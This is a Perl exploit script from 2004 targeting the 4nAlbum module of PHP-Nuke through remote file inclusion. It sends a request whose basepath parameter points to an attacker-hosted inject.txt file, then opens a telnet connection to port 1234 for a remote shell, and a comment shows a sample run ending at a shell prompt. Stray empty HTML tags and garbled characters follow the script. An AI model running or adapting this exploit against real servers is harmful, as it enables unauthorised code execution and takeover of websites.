#!/usr/bin/perl -w # #-bash-2.05b$ perl 4nalb.pl -t 192.168.1.10 -d nuke #Usage: perl 4nalb.pl -t -d #Remote Exploit 4nAlbum by adil@ccc.ma & alaa_eddine83@hotmail.com ############################# # Moroccan Security Radar # CCC MAROC 2004 ############################# #Target: 192.168.1.10 #Directory: nuke #++++++++++++++++++++++++++++++++++++++++++++++++ #Vuln - Vuln - 3 - 2 - 1 ------ #connected #Trying 192.168.1.10... #Connected to 192.168.1.10. #Escape character is '^]'. #sh-2.05b$ require LWP::UserAgent; use Getopt::Std; getopts('t:d:'); our($opt_t, $opt_d); my $target = $opt_t; my $dir = $opt_d; print "Usage: perl 4nalb.pl -t -d \n\n"; print "Remote Exploit 4nAlbum by adil At ccc.ma & alaa_eddine83 At hotmail.com\n"; print "#############################\n"; print " Moroccan Security Radar\n"; print " CCC MAROC 2004 \n"; print "#############################\n"; print "Target: $target\n"; print "Directory: $dir\n"; my $ua = LWP::UserAgent->new; $ua->agent("Linux"); $ua->timeout(10); $ua->env_proxy; $req = "http://$target/$dir/modules/4nAlbum/public/displayCategory.php?basepath=http://www.attaker.com/inject.txt?&cmd="; my $response = $ua->get($req); print "++++++++++++++++++++++++++++++++++++++++++++++++\n"; if ($response->is_success) { print "Vuln - Vuln - 3 - 2 - 1 ------\n"; print "connected\n"; sleep(3); exec("telnet $target 1234"); } else { die $response->status_line; } print "++++++++++++++++++++++++++++++++++++++++++++++++++\n"; # EOF
<span id="7ztzv"></span>
<sub id="7ztzv"></sub>


<span id="7ztzv"></span><form id="7ztzv"></form>


<span id="7ztzv"></span>
    

      

        <address id="7ztzv"></address>
            

ÑÇÖÞÅ·ÃÀÔÚÏß